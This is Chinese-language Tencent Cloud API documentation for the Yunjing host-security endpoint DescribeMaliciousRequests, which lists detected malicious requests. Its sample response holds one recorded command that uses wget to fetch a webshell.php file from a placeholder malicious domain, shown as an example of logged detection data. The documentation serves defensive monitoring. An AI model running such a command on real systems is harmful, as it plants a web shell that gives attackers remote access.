获取恶意请求数据

最近更新时间:2018-12-07 20:46:13

1. 接口描述

接口请求域名: yunjing.tencentcloudapi.com 。

本接口 (DescribeMaliciousRequests) 用于获取恶意请求数据。

默认接口请求频率限制:20次/秒。

2. 输入参数

以下请求参数列表仅列出了接口请求参数和部分公共参数,完整公共参数列表见公共请求参数

参数名称 必选 类型 描述
Action String 公共参数,本接口取值:DescribeMaliciousRequests
Version String 公共参数,本接口取值:2018-02-28
Region String 公共参数,本接口不需要传递此参数。
Limit Integer 返回数量,默认为10,最大值为100。
Offset Integer 偏移量,默认为0。
Filters.N Array of Filter 过滤条件。
  • Status - String - 是否必填:否 - 状态筛选(UN_OPERATED: 待处理 | TRUSTED:已信任 | UN_TRUSTED:已取消信任)
  • Domain - String - 是否必填:否 - 恶意请求的域名
  • MachineIp - String - 是否必填:否 - 主机内网IP
  • Uuid String 云镜客户端唯一UUID。

    3. 输出参数

    参数名称 类型 描述
    TotalCount Integer 记录总数。
    MaliciousRequests Array of MaliciousRequest 恶意请求记录数组。
    RequestId String 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。

    4. 示例

    示例1 获取恶意请求数据

    输入示例

    https://yunjing.tencentcloudapi.com/?Action=DescribeMaliciousRequests
    &Limit=10
    &Offset=0
    &<公共请求参数>

    输出示例

    {
      "Response": {
        "MaliciousRequests": [
          {
            "CmdLine": "wget http://www.malicious_domain.com/webshell.php",
            "Count": 10,
            "CreateTime": "2018-10-10 10:11:12",
            "Description": "description",
            "Domain": "www.malicious_domain.com",
            "Id": 1,
            "MachineIp": "10.10.1.1",
            "MachineName": "machienname",
            "MergeTime": "2018-10-10 10:11:12",
            "Pid": 5577,
            "ProcessMd5": "ab0ffdb812fab5a0e1e8b83d39c63ce9",
            "ProcessName": "wget",
            "Reference": "reference",
            "Status": "UN_OPERATED",
            "Uuid": "add4a78a-0d59-11e8-b7ab-00e081e1a5c5"
          }
        ],
        "RequestId": "354f4ac3-8546-4516-8c8a-69e3ab73aa8a",
        "TotalCount": 100
      }
    }

    5. 开发者资源

    API Explorer

    该工具提供了在线调用、签名验证、SDK 代码生成和快速检索接口等能力,能显著降低使用云 API 的难度,推荐使用。

    SDK

    云 API 3.0 提供了配套的开发工具集(SDK),支持多种编程语言,能更方便的调用 API。

    命令行工具

    6. 错误码

    以下仅列出了接口业务逻辑相关的错误码,其他错误码详见公共错误码

    错误码 描述
    InternalError 内部错误
    InvalidParameter.IllegalRequest 非法请求。